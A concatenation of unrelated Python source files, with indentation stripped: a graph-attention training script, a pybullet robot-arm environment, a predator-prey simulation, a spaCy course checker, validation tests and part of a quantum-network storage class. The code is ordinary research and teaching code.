with pytest.raises(TypeError, match="Expected a list or tuple of scales"):
tile_url.validate_scales(0)
with pytest.raises(TypeError, match="Expected a list or tuple of scales"):
tile_url.validate_scales("foo")
with pytest.raises(TypeError, match="Scaling 0: expected a 2-item list or tuple"):
tile_url.validate_scales([1, 2, 3])
with pytest.raises(TypeError, match="Scaling 0: items in scaling must be numbers"):
tile_url.validate_scales([1, "foo"])
with pytest.raises(ValueError, match="expected up to 3 scales, but got 4"):
tile_url.validate_scales([[0.0, 1.0], [0.0, 1.0], [0.0, 1.0], [0.0, 1.0]])
with pytest.raises(ValueError, match="but length was 3"):
tile_url.validate_scales([[0.0, 1.0, 2.0]])
with pytest.raises(ValueError, match="but length was 1"):
tile_url.validate_scales([[0.0]])
with pytest.raises(ValueError, match="one number and one None in scales"):
tile_url.validate_scales([[None, 1.0]])
|
23097
|
import os
import time
import random
import scipy.sparse as sp
import numpy as np
import tensorflow as tf
import argparse
from models import SpHGAT
from utils import process
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', help='Dataset.', default='imdb', type=str)
parser.add_argument('--epochs', help='Epochs.', default=100000, type=int)
parser.add_argument('--patience', help='Patience for early stopping.', default=100, type=int)
parser.add_argument('--lr', help='Learning rate.', default=0.005, type=float)
parser.add_argument('--l2_coef', help='Weight decay.', default=0.0005, type=float)
parser.add_argument('--dropout', help='Dropout.', default=0.6, type=float)
parser.add_argument('--train_rate', help='Label rate for training.', default=0.1, type=float)
parser.add_argument('--seed', help='Random seed for data splitting.', default=None, type=int)
parser.add_argument('--layers', help='Number of layers.', default=2, type=int)
parser.add_argument('--hid', help='Number of hidden units per head in each layer.',
nargs='*', default=[8, 8], type=int)
parser.add_argument('--heads', help='Number of attention heads in each layer.',
nargs='*', default=[8, 1], type=int)
parser.add_argument('--residue', help='Using residue.', action='store_true')
parser.add_argument('--repeat', help='Repeat.', default=10, type=int)
parser.add_argument('--random_feature', help='Random features', action='store_true')
parser.add_argument('--target_node', help='index of target nodes for classification.',
nargs='*', default=[0, 1], type=int)
parser.add_argument('--target_is_multilabels', help='each type of target node for classification is multi-labels or not.(0 means not else means yes)',
nargs='*', default=[0, 1], type=int)
parser.add_argument('--saved_model_suffix', help='to splite checkpoint by suffix', default="", type=str)
parser.add_argument('--no_attn_reg', help='Do not use edge direction regularization', action='store_true')
parser.add_argument('--simple_inner', help='Use original inner product', action='store_true')
parser.add_argument('--loop_coef', help='Coefficient for regularization.', default=1e-3, type=float)
parser.add_argument('--inv_coef', help='Coefficient for regularization.', default=1e-3, type=float)
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
args= parser.parse_args()
dataset = args.dataset
checkpt_file = 'pre_trained/{}/{}/{}.ckpt'.format(dataset, args.saved_model_suffix, dataset)
checkpt_file = checkpt_file.replace('//', '/')
process.mkdir(os.path.split(checkpt_file)[0])
# training params
batch_size = 1
train_rate = args.train_rate
seed = args.seed
nb_epochs = args.epochs
patience = args.patience
lr = args.lr # learning rate
l2_coef = args.l2_coef # weight decay
dropout = args.dropout
repeat = args.repeat
random_feature = args.random_feature
target_node = args.target_node
is_multilabel = [False if t==0 else True for t in args.target_is_multilabels]
loop_coef = args.loop_coef
inv_coef = args.inv_coef
layers = args.layers
hid = args.hid
if len(hid) == 1:
hid_units = hid * layers
elif len(hid) == layers:
hid_units = hid
heads = args.heads
if len(heads) == 1:
n_heads = heads * layers
elif len(heads) == 2:
n_heads = [heads[0]] * (layers - 1) + [heads[1]]
elif len(heads) == layers:
n_heads = heads
residual = args.residue # False
nonlinearity = tf.nn.elu
model = SpHGAT
no_attn_reg = args.no_attn_reg
simple_inner = args.simple_inner
random.seed(seed) # random seed for random data split only
print('Dataset: ' + dataset)
print('Train rate: ' + str(train_rate))
print('----- Opt. hyperparams -----')
print('lr: ' + str(lr))
print('l2_coef: ' + str(l2_coef))
print('----- Archi. hyperparams -----')
print('nb. layers: ' + str(len(hid_units)))
print('nb. units per layer: ' + str(hid_units))
print('nb. attention heads: ' + str(n_heads))
print('residual: ' + str(residual))
print('nonlinearity: ' + str(nonlinearity))
print('model: ' + str(model))
print('target nodes: ', target_node)
print('is_multilabel: ', is_multilabel)
print('loop_coef:', loop_coef)
print('inv_coef:', inv_coef)
sparse = True
metr_num = 2
total_vl_acc = np.array([0.]*(len(target_node)*metr_num)) # should be array
total_ts_acc = np.array([0.]*(len(target_node)*metr_num)) # should be array
def get_loss_acc(logits, labels, msk, is_multilabel=False):
global model
class_num = labels.shape[-1]
log_resh = tf.reshape(logits, [-1, class_num])
lab_resh = tf.reshape(labels, [-1, class_num])
msk_resh = tf.reshape(msk, [-1])
if is_multilabel:
loss = model.masked_sigmoid_cross_entropy(log_resh, lab_resh, msk_resh)
accuracy = [model.micro_f1(log_resh, lab_resh, msk_resh), model.macro_f1(log_resh, lab_resh, msk_resh)]
acc_name = ['if1', 'af1']
acc_full_name = ['micro f1', 'macro f1']
else:
loss = model.masked_softmax_cross_entropy(log_resh, lab_resh, msk_resh)
accuracy = [model.micro_f1_onelabel(log_resh, lab_resh, msk_resh), model.macro_f1_onelabel(log_resh, lab_resh, msk_resh)]
acc_name = ['if1', 'af1']
acc_full_name = ['micro f1', 'macro f1']
return loss, accuracy, acc_name, acc_full_name
def print_eachclass_info(train_loss_each, train_acc_each, val_loss_each, val_acc_each, acc_name):
tl_average = np.mean(np.array(train_loss_each), axis=0)
ta_average = np.mean(np.array(train_acc_each), axis=0)
vl_average = np.mean(np.array(val_loss_each), axis=0)
va_average = np.mean(np.array(val_acc_each), axis=0)
metric_num = int(len(ta_average)/len(tl_average))
for i in range(len(tl_average)):
line = '\t\t target %s: loss = %.3f, ' % (i, tl_average[i])
for j in range(metric_num):
line += '%s = %.5f, ' % (acc_name[i*metric_num+j], ta_average[i*metric_num+j])
line += '| Val: loss = %.3f, ' % (vl_average[i])
for j in range(metric_num):
line += '%s = %.5f, ' % (acc_name[i*metric_num+j], va_average[i*metric_num+j])
print(line)
for repeat_i in range(repeat):
print('Run #' + str(repeat_i) + ':')
adj, adj_type, edge_list, features, y_train, y_val, y_test,\
train_mask, val_mask, test_mask = process.load_heterogeneous_data(dataset, train_rate=train_rate, target_node=target_node)
features = [process.preprocess_features(feature)[0] for feature in features]
nb_nodes = [feature.shape[0] for feature in features]
ft_size = [feature.shape[1] for feature in features]
nb_classes = [y.shape[1] for y in y_train]
features = [feature[np.newaxis] for feature in features]
y_train = [y[np.newaxis] for y in y_train]
y_val = [y[np.newaxis] for y in y_val]
y_test = [y[np.newaxis] for y in y_test]
train_mask = [m[np.newaxis] for m in train_mask]
val_mask = [m[np.newaxis] for m in val_mask]
test_mask = [m[np.newaxis] for m in test_mask]
if random_feature:
features[0] = np.random.standard_normal(features[0].shape)
if sparse:
biases = [process.preprocess_adj_hete(a) for a in adj] # transposed here
else:
biases = []
for a in adj:
a = a.todense()
a = a[np.newaxis]
if no_attn_reg:
edge_list = [(i,) for i in range(len(adj_type))]
if simple_inner:
edge_list = []
with tf.Graph().as_default():
with tf.name_scope('input'):
ftr_in = [tf.placeholder(dtype=tf.float32,
shape=(batch_size, nb, ft)) for nb, ft in zip(nb_nodes, ft_size)]
if sparse:
bias_in = [tf.sparse_placeholder(dtype=tf.float32) for _ in biases]
else:
bias_in = None
lbl_in = [tf.placeholder(dtype=tf.int32, shape=(batch_size, nb_nodes[target_node[i]], nb_classes[i])) for i in range(len(nb_classes))]
msk_in = [tf.placeholder(dtype=tf.int32, shape=(batch_size, nb_nodes[target_node[i]])) for i in range(len(nb_classes))]
attn_drop = tf.placeholder(dtype=tf.float32, shape=())
ffd_drop = tf.placeholder(dtype=tf.float32, shape=())
is_train = tf.placeholder(dtype=tf.bool, shape=())
logits = model.inference(ftr_in, nb_classes, nb_nodes, is_train,
attn_drop, ffd_drop, target_nodes=target_node,
bias_mat=bias_in, adj_type=adj_type,
edge_list=edge_list,
hid_units=hid_units, n_heads=n_heads,
residual=residual, activation=nonlinearity)
with tf.name_scope('loss_acc'):
loss, accuracy, acc_name, acc_full_name = [], [], [], []
all_class_loss = 0.0
for tn in range(len(target_node)):
tn_logits = logits[tn]
tn_labels = lbl_in[tn]
tn_masks = msk_in[tn]
tn_is_multilabel = is_multilabel[tn]
tn_loss, tn_accuracy, tn_acc_name, tn_acc_full_name = get_loss_acc(tn_logits, tn_labels, tn_masks, is_multilabel=tn_is_multilabel)
loss.append(tn_loss)
accuracy.extend(tn_accuracy)
acc_name.extend(tn_acc_name)
acc_full_name.extend(tn_acc_full_name)
all_class_loss += tn_loss
loss_loop = tf.add_n(tf.get_collection('loss_loop')) * loop_coef
loss_inv= tf.add_n(tf.get_collection('loss_inv')) * inv_coef
train_op = model.training(all_class_loss + loss_loop + loss_inv, lr, l2_coef)
saver = tf.train.Saver()
init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
vlss_mn = np.inf
vacc_mx = 0.0
curr_step = 0
with tf.Session(config=config) as sess:
sess.run(init_op)
vacc_early_model = 0.0
vlss_early_model = 0.0
vacc_each_early_model = np.array([0.]*(len(target_node)*metr_num))
for epoch in range(nb_epochs):
# summary information
train_loss_avg = 0
train_acc_avg = 0
val_loss_avg = 0
val_acc_avg = 0
# for each class information
train_loss_each = []
train_acc_each = []
val_loss_each = []
val_acc_each = []
tr_step = 0
tr_size = features[0].shape[0]
while tr_step * batch_size < tr_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[tr_step * batch_size:(tr_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[tr_step * batch_size:(tr_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[tr_step*batch_size:(tr_step+1)*batch_size] for i, d in zip(lbl_in, y_train)})
fd.update({i:d[tr_step*batch_size:(tr_step+1)*batch_size] for i, d in zip(msk_in, train_mask)})
fd.update({is_train: True})
fd.update({attn_drop: dropout, ffd_drop:dropout})
_, loss_list_tr, acc_list_tr, loss_loop_tr, loss_inv_tr = sess.run([train_op, loss, accuracy, loss_loop, loss_inv], feed_dict=fd)
train_loss_each.append(np.array(loss_list_tr))
train_acc_each.append(np.array(acc_list_tr))
train_loss_avg += np.sum(np.array(loss_list_tr))
train_acc_avg += np.sum(np.array(acc_list_tr))
tr_step += 1
vl_step = 0
vl_size = features[0].shape[0]
while vl_step * batch_size < vl_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[vl_step * batch_size:(vl_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[vl_step * batch_size:(vl_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[vl_step*batch_size:(vl_step+1)*batch_size] for i, d in zip(lbl_in, y_val)})
fd.update({i:d[vl_step*batch_size:(vl_step+1)*batch_size] for i, d in zip(msk_in, val_mask)})
fd.update({is_train: False})
fd.update({attn_drop: 0.0, ffd_drop:0.0})
loss_list_vl, acc_list_vl = sess.run([loss, accuracy], feed_dict=fd)
acc_list_vl = [0. if np.isnan(acc_vl) else acc_vl for acc_vl in acc_list_vl]
val_loss_each.append(np.array(loss_list_vl))
val_acc_each.append(np.array(acc_list_vl))
val_loss_avg += np.sum(np.array(loss_list_vl))
val_acc_avg += np.sum(np.array(acc_list_vl))
vl_step += 1
print('Training %s: loss = %.5f, %s = %.5f, loss_loop = %.5f, loss_inv = %.5f | Val: loss = %.5f, %s = %.5f' %
(epoch, train_loss_avg/tr_step, 'acc/F1', train_acc_avg/tr_step,
loss_loop_tr, loss_inv_tr,
val_loss_avg/vl_step, 'acc/F1', val_acc_avg/vl_step))
print_eachclass_info(train_loss_each, train_acc_each, val_loss_each, val_acc_each, acc_name)
if val_acc_avg/vl_step > vacc_mx or val_loss_avg/vl_step < vlss_mn:
if val_acc_avg/vl_step > vacc_mx and val_loss_avg/vl_step < vlss_mn:
vacc_early_model = val_acc_avg/vl_step
vlss_early_model = val_loss_avg/vl_step
vacc_each_early_model = np.mean(np.array(val_acc_each), axis=0)
saver.save(sess, checkpt_file)
print("saved model as %s"%checkpt_file)
vacc_mx = np.max((val_acc_avg/vl_step, vacc_mx))
vlss_mn = np.min((val_loss_avg/vl_step, vlss_mn))
curr_step = 0
else:
curr_step += 1
if curr_step == patience:
print('Early stop! Min loss: ', vlss_mn,
', Max', 'acc/F1', ': ', vacc_mx)
print('Early stop model validation loss: ', vlss_early_model,
', ', 'acc/F1', ': ', vacc_early_model)
total_vl_acc += vacc_each_early_model
break
if curr_step < patience:
print('Min loss: ', vlss_mn, ', Max', 'acc/F1', ': ', vacc_mx)
print('model validation loss: ', vlss_early_model, ', ', 'acc/F1', ': ', vacc_early_model)
total_vl_acc += vacc_each_early_model
saver.restore(sess, checkpt_file)
ts_size = features[0].shape[0]
ts_step = 0
test_loss_each = []
test_acc_each = []
while ts_step * batch_size < ts_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[ts_step * batch_size:(ts_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[ts_step * batch_size:(ts_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[ts_step*batch_size:(ts_step+1)*batch_size] for i, d in zip(lbl_in, y_test)})
fd.update({i:d[ts_step*batch_size:(ts_step+1)*batch_size] for i, d in zip(msk_in, test_mask)})
fd.update({is_train: False})
fd.update({attn_drop: 0.0, ffd_drop:0.0})
loss_list_ts, acc_list_ts = sess.run([loss, accuracy], feed_dict=fd)
test_loss_each.append(np.array(loss_list_ts))
test_acc_each.append(np.array(acc_list_ts))
ts_step += 1
test_loss_each = np.mean(np.array(test_loss_each), axis=0)
test_acc_each = np.mean(np.array(test_acc_each), axis=0)
print('*'*10,'Test information:', '*'*10)
for e in range(len(target_node)):
print('target %s: loss: %.3f, %s:%.5f, %s:%.5f' % (e, test_loss_each[e], acc_full_name[e*metr_num], test_acc_each[e*metr_num], acc_full_name[e*metr_num+1], test_acc_each[e*metr_num+1]))
total_ts_acc += test_acc_each
sess.close()
print('Validation:', total_vl_acc/repeat, 'Test:', total_ts_acc/repeat)
|
23147
|
def test():
assert "spacy.load" in __solution__, "Rufst du spacy.load auf?"
assert nlp.meta["lang"] == "de", "Lädst du das korrekte Modell?"
assert nlp.meta["name"] == "core_news_sm", "Lädst du das korrekte Modell?"
assert "nlp(text)" in __solution__, "Verarbeitest du den Text korrekt?"
assert "print(doc.text)" in __solution__, "Druckst du den Text des Doc?"
__msg__.good(
"Gut gemacht! Jetzt wo du das Laden von Modellen geübt hast, lass uns "
"mal ein paar ihrer Vorhersagen anschauen."
)
|
23148
|
import pycxsimulator
from pylab import *
import copy as cp
nr = 500. # carrying capacity of rabbits
r_init = 100 # initial rabbit population
mr = 0.03 # magnitude of movement of rabbits
dr = 1.0 # death rate of rabbits when it faces foxes
rr = 0.1 # reproduction rate of rabbits
f_init = 30 # initial fox population
mf = 0.05 # magnitude of movement of foxes
df = 0.1 # death rate of foxes when there is no food
rf = 0.5 # reproduction rate of foxes
cd = 0.02 # radius for collision detection
cdsq = cd ** 2
class agent:
pass
def initialize():
global agents
agents = []
for i in range(r_init + f_init):
ag = agent()
ag.type = 'r' if i < r_init else 'f'
ag.x = random()
ag.y = random()
agents.append(ag)
def observe():
global agents
cla()
rabbits = [ag for ag in agents if ag.type == 'r']
if len(rabbits) > 0:
x = [ag.x for ag in rabbits]
y = [ag.y for ag in rabbits]
plot(x, y, 'b.')
foxes = [ag for ag in agents if ag.type == 'f']
if len(foxes) > 0:
x = [ag.x for ag in foxes]
y = [ag.y for ag in foxes]
plot(x, y, 'ro')
axis('image')
axis([0, 1, 0, 1])
def update_one_agent():
global agents
if agents == []:
return
ag = choice(agents)
# simulating random movement
m = mr if ag.type == 'r' else mf
ag.x += uniform(-m, m)
ag.y += uniform(-m, m)
ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x
ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y
# detecting collision and simulating death or birth
neighbors = [nb for nb in agents if nb.type != ag.type
and (ag.x - nb.x)**2 + (ag.y - nb.y)**2 < cdsq]
if ag.type == 'r':
if len(neighbors) > 0: # if there are foxes nearby
if random() < dr:
agents.remove(ag)
return
if random() < rr*(1-sum([1 for x in agents if x.type == 'r'])/nr):
agents.append(cp.copy(ag))
else:
if len(neighbors) == 0: # if there are no rabbits nearby
if random() < df:
agents.remove(ag)
return
else: # if there are rabbits nearby
if random() < rf:
agents.append(cp.copy(ag))
def update():
global agents
t = 0.
while t < 1. and len(agents) > 0:
t += 1. / len(agents)
update_one_agent()
pycxsimulator.GUI().start(func=[initialize, observe, update])
|
23164
|
import pybullet_data
import pybullet as p
import time
import numpy as np
from src.utils_geom import *
from src.utils_depth import *
from src.panda import Panda
def full_jacob_pb(jac_t, jac_r):
return np.vstack((jac_t[0], jac_t[1], jac_t[2], jac_r[0], jac_r[1], jac_r[2]))
class pandaEnv():
def __init__(self,
urdfRoot=pybullet_data.getDataPath(),
mu=0.3,
sigma=0.01,
timestep=1./240.,
long_finger=False,
):
self._urdfRoot = urdfRoot
self._timeStep = timestep
self._pandaId = None
self._planeId = None
self._tableId = None
self._mu = mu
self._sigma = sigma
self.long_finger = long_finger
def reset_env(self):
p.resetSimulation()
p.setPhysicsEngineParameter(numSolverIterations=150,
enableConeFriction=1,
contactBreakingThreshold=1e-3)
p.setTimeStep(self._timeStep)
# Set gravity
p.setGravity(0, 0, -9.81)
# Load plane and table
self._planeId = p.loadURDF(self._urdfRoot+'/plane.urdf', basePosition=[0, 0, -1], useFixedBase=1)
self._tableId = p.loadURDF(self._urdfRoot+'/table/table.urdf', basePosition=[0.4000000, 0.00000, -0.63+0.005], baseOrientation=[0, 0, 0, 1.0], useFixedBase=1)
# Load arm, no need to settle (joint angle set instantly)
self._panda = Panda(self.long_finger)
self._pandaId = self._panda.load()
# Set friction coefficients of arm and table
self.change_friction_coeffs(self._mu, self._sigma)
# Create a constraint to keep the fingers centered (upper links)
fingerGear = p.createConstraint(self._pandaId,
9,
self._pandaId,
11,
jointType=p.JOINT_GEAR,
jointAxis=[1, 0, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(fingerGear, gearRatio=-1, erp=0.1, maxForce=2*self._panda.maxFingerForce)
# Disable damping for all links
for i in range(self._panda.numJoints):
p.changeDynamics(self._pandaId, i,
linearDamping=0,
angularDamping=0)
def change_friction_coeffs(self, mu, sigma):
p.changeDynamics(self._pandaId, self._panda.pandaLeftFingerLinkIndex, lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
p.changeDynamics(self._pandaId, self._panda.pandaRightFingerLinkIndex, lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
p.changeDynamics(self._tableId, -1,
lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
def reset_arm_joints_ik(self, pos, orn, fingerPos=0.0):
jointPoses = list(p.calculateInverseKinematics(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
pos, orn,
jointDamping=self._panda.jd,
lowerLimits=self._panda.jointLowerLimit,
upperLimits=self._panda.jointUpperLimit,
jointRanges=self._panda.jointRange,
restPoses=self._panda.jointRestPose,
residualThreshold=1e-4))
# , maxNumIterations=1e5))
jointPoses = jointPoses[:7] + [0, -np.pi/4, fingerPos, 0.00, fingerPos, 0.00]
self._panda.reset(jointPoses)
def reset_arm_joints(self, joints):
jointPoses = joints + [0, -np.pi/4, self._panda.fingerOpenPos,
0.00, self._panda.fingerOpenPos, 0.00]
self._panda.reset(jointPoses)
########################* Arm control *#######################
def move_pos(self, absolute_pos=None,
relative_pos=None,
absolute_global_euler=None, # preferred
relative_global_euler=None, # preferred
relative_local_euler=None, # not using
absolute_global_quat=None, # preferred
relative_azi=None, # for arm
# relative_quat=None, # never use relative quat
numSteps=50,
maxJointVel=0.20,
relativePos=True,
globalOrn=True,
checkContact=False,
checkPalmContact=False,
objId=None,
gripper_target_pos=None,
timeStep=0):
# Get trajectory
eePosNow, eeQuatNow = self._panda.get_ee()
# Determine target pos
if absolute_pos is not None:
targetPos = absolute_pos
elif relative_pos is not None:
targetPos = eePosNow + relative_pos
else:
targetPos = eePosNow
# Determine target orn
if absolute_global_euler is not None:
targetOrn = euler2quat(absolute_global_euler)
elif relative_global_euler is not None:
targetOrn = quatMult(euler2quat(relative_global_euler), eeQuatNow)
elif relative_local_euler is not None:
targetOrn = quatMult(eeQuatNow, euler2quat(relative_local_euler))
elif absolute_global_quat is not None:
targetOrn = absolute_global_quat
elif relative_azi is not None:
# Extrinsic yaw
targetOrn = quatMult(euler2quat([relative_azi[0],0,0]), eeQuatNow)
# Intrinsic pitch
targetOrn = quatMult(targetOrn, euler2quat([0,relative_azi[1],0]))
# elif relative_quat is not None:
# targetOrn = quatMult(eeQuatNow, relative_quat)
else:
targetOrn = array([1.0, 0., 0., 0.])
# Get trajectory
trajPos = self.traj_time_scaling(startPos=eePosNow,
endPos=targetPos,
numSteps=numSteps)
# Run steps
numSteps = len(trajPos)
for step in range(numSteps):
# Get joint velocities from error tracking control
jointDot = self.traj_tracking_vel(targetPos=trajPos[step], targetQuat=targetOrn)
# Send velocity commands to joints
for i in range(self._panda.numJointsArm):
p.setJointMotorControl2(self._pandaId,
i,
p.VELOCITY_CONTROL,
targetVelocity=jointDot[i],
force=self._panda.maxJointForce[i],
maxVelocity=maxJointVel)
if gripper_target_pos is None:
# Keep gripper current velocity
p.setJointMotorControl2(self._pandaId,
self._panda.pandaLeftFingerJointIndex,
p.VELOCITY_CONTROL,
targetVelocity=self._panda.fingerCurVel,
force=self._panda.maxJointForce[i],
maxVelocity=0.04)
p.setJointMotorControl2(self._pandaId,
self._panda.pandaRightFingerJointIndex,
p.VELOCITY_CONTROL,
targetVelocity=self._panda.fingerCurVel,
force=self._panda.maxJointForce[i],
maxVelocity=0.04)
else:
p.setJointMotorControl2(self._pandaId,
self._panda.pandaLeftFingerJointIndex,
p.POSITION_CONTROL,
targetPosition=gripper_target_pos,
maxVelocity=0.04)
p.setJointMotorControl2(self._pandaId,
self._panda.pandaRightFingerJointIndex,
p.POSITION_CONTROL,
targetPosition=gripper_target_pos,
maxVelocity=0.04)
# Quit if contact at either finger or palm
if checkContact:
contact = self.check_contact(objId, both=False)
if contact:
return timeStep, False
if checkPalmContact:
contact = self.check_palm_contact(objId)
if contact:
return timeStep, False
# Step simulation
p.stepSimulation()
timeStep += 1
return timeStep, True
def grasp(self, targetVel=0):
# Change gripper velocity direction
if targetVel > 1e-2 or targetVel < -1e-2: # Use specified velocity if available
self._panda.fingerCurVel = targetVel
else:
if self._panda.fingerCurVel > 0.0:
self._panda.fingerCurVel = -0.05
else:
self._panda.fingerCurVel = 0.05
return
def traj_time_scaling(self, startPos, endPos, numSteps):
trajPos = np.zeros((numSteps, 3))
for step in range(numSteps):
s = 3 * (1.0 * step / numSteps) ** 2 - 2 * (1.0 * step / numSteps) ** 3
trajPos[step] = (endPos-startPos)*s+startPos
return trajPos
def traj_tracking_vel(self, targetPos, targetQuat, posGain=20, velGain=5):
eePos, eeQuat = self._panda.get_ee()
eePosError = targetPos - eePos
eeOrnError = log_rot(quat2rot(targetQuat).dot((quat2rot(eeQuat).T))) # in spatial frame
jointPoses = self._panda.get_arm_joints() + [0,0,0] # add fingers
eeState = p.getLinkState(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
computeLinkVelocity=1,
computeForwardKinematics=1)
# Get the Jacobians for the CoM of the end-effector link. Note that in this example com_rot = identity, and we would need to use com_rot.T * com_trn. The localPosition is always defined in terms of the link frame coordinates.
zero_vec = [0.0] * len(jointPoses)
jac_t, jac_r = p.calculateJacobian(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
eeState[2],
jointPoses,
zero_vec,
zero_vec) # use localInertialFrameOrientation
jac_sp = full_jacob_pb(jac_t, jac_r)[:, :7] # 6x10 -> 6x7, ignore last three columns
try:
jointDot = np.linalg.pinv(jac_sp).dot((np.hstack((posGain*eePosError, velGain*eeOrnError)).reshape(6,1))) # pseudo-inverse
except np.linalg.LinAlgError:
jointDot = np.zeros((7,1))
return jointDot
############################### Contact ##################################
def get_contact(self, objId, minForceThres=1e-1):
left_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaLeftFingerLinkIndex,
linkIndexB=-1)
right_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaRightFingerLinkIndex,
linkIndexB=-1)
left_contacts = [i for i in left_contacts if i[9] > minForceThres]
right_contacts = [i for i in right_contacts if i[9] > minForceThres]
return left_contacts, right_contacts
def get_finger_force(self, objId):
left_contacts, right_contacts = self.get_contact(objId)
left_force = np.zeros((3))
right_force = np.zeros((3))
for i in left_contacts:
left_force += i[9]*np.array(i[7])+i[10]*np.array(i[11])+i[12]*np.array(i[13])
for i in right_contacts:
right_force += i[9]*np.array(i[7])+i[10]*np.array(i[11])+i[12]*np.array(i[13])
leftNormalMag = sum([i[9] for i in left_contacts])
rightNormalMag = sum([i[9] for i in right_contacts])
numLeftContact = len(left_contacts)
numRightContact = len(right_contacts)
if numLeftContact < 1 or numRightContact < 1:
return None
else:
return left_force, right_force, \
np.array(left_contacts[0][6]), np.array(right_contacts[0][6]), \
leftNormalMag, rightNormalMag
def check_hold_object(self, objId, minForceThres=10.0):
left_contacts, right_contacts = self.get_contact(objId)
leftNormalMag = sum([i[9] for i in left_contacts])
rightNormalMag = sum([i[9] for i in right_contacts])
return leftNormalMag > minForceThres and rightNormalMag > minForceThres
def check_contact(self, objId, both=False):
leftContacts, rightContacts = self.get_contact(objId)
if both:
if len(leftContacts) > 0 and len(rightContacts) > 0:
return 1
else:
if len(leftContacts) > 0 or len(rightContacts) > 0:
return 1
return 0
def check_palm_contact(self, objId, minForceThres=1e-1):
palm_contacts = p.getContactPoints(self._pandaId,
objId,
linkIndexA=self._panda.pandaHandLinkIndex,
linkIndexB=-1)
palm_contacts = [i for i in palm_contacts if i[9] > minForceThres]
return len(palm_contacts) > 0
############################### Info ##################################
def get_ee(self):
return self._panda.get_ee()
def get_gripper_tip_long(self):
return self._panda.get_gripper_tip_long()
def get_arm_joints(self):
return self._panda.get_arm_joints()
def get_gripper_joint(self):
return self._panda.get_gripper_joint()
def get_left_finger(self):
return self._panda.get_left_finger()
def get_right_finger(self):
return self._panda.get_right_finger()
def get_obs(self):
return self._panda.get_obs()
|
23198
|
from qunetsim.backends.rw_lock import RWLock
from qunetsim.objects.logger import Logger
import queue
class QuantumStorage(object):
"""
An object which stores qubits.
"""
STORAGE_LIMIT_ALL = 1
STORAGE_LIMIT_PER_HOST = 2
STORAGE_LIMIT_INDIVIDUALLY_PER_HOST = 3
def __init__(self):
# _host_dict stores host_id -> array with qubits of the host.
self._host_dict = {}
# _qubit_dict stores qubit_id -> dict Host_id -> Qubit objects with this id.
self._qubit_dict = {}
# _purpose_dict stores qubit_id -> dict Host_id -> Purpose belonging to
# the Qubit with the same Host and ID.
self._purpose_dict = {}
self._storage_mode = QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST
self._storage_limits_per_host = {}
self._amount_qubits_stored_per_host = {}
self._default_storage_limit_per_host = -1
self._storage_limit = -1
self._amount_qubit_stored = 0
# read write lock, for threaded access
self.lock = RWLock()
self.logger = Logger.get_instance()
# for tracking pending requests
# dictionary tracks the request made by a pending request.
self._pending_request_dict = {}
# Determines a unique ID for a pending request.
self._request_id = 0
# Amount of pending requests
self._amount_pending_requests = 0
def __str__(self):
out = ""
out += "Quantum storage with the properties:\nstorage mode: %d\nstorage limit: %d\n" % (
self._storage_mode, self._storage_limit)
out += "Host dictionary is:\n"
out += "; ".join([str(key) + ":" + str([v.id for v in value])
for key, value in self._host_dict.items()])
out += "\n"
out += "Qubit dictionary is:\n"
out += "; ".join([str(key) + ":" + str(value)
for key, value in self._qubit_dict.items()])
out += "\n"
out += "Purpose dictionary is:\n"
out += "; ".join([str(key) + ":" + str(value)
for key, value in self._purpose_dict.items()])
out += "\n"
return out
@property
def storage_limit(self):
return self._storage_limit
@storage_limit.setter
def storage_limit(self, new_limit):
"""
Set a new storage limit for the storage. The implementations depends on
the storage mode.
Args:
new_limit (int): The new max amount of qubit.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_ALL:
self._storage_limit = new_limit
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_PER_HOST:
self._storage_limit = new_limit
elif self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
self._default_storage_limit_per_host = new_limit
for id_ in list(self._storage_limits_per_host):
self._storage_limits_per_host[id_] = new_limit
else:
raise ValueError(
"Internal Value Error, this storage mode does not exist.")
@property
def storage_limit_mode(self):
return self._storage_mode
@storage_limit_mode.setter
def storage_limit_mode(self, new_mode):
self._storage_mode = new_mode
@property
def amount_qubits_stored(self):
return self._amount_qubit_stored
def amount_qubits_stored_with_host(self, host_id):
return self._amount_qubits_stored_per_host[host_id]
def set_storage_limit_with_host(self, new_limit, host_id):
"""
Set a new storage limit for the storage. The implementations depends on
the storage mode.
Args:
new_limit (int): The new max amount of qubit.
host_id (str): optional, if given, and the storage mode is
STORAGE_LIMIT_INDIVIDUALLY_PER_HOST, the limit is only
set for this specific host.
"""
if self._storage_mode == QuantumStorage.STORAGE_LIMIT_INDIVIDUALLY_PER_HOST:
if host_id is None:
raise ValueError(
"Host ID must be given in this storage mode")
else:
self._storage_limits_per_host[host_id] = new_limit
else:
raise ValueError(
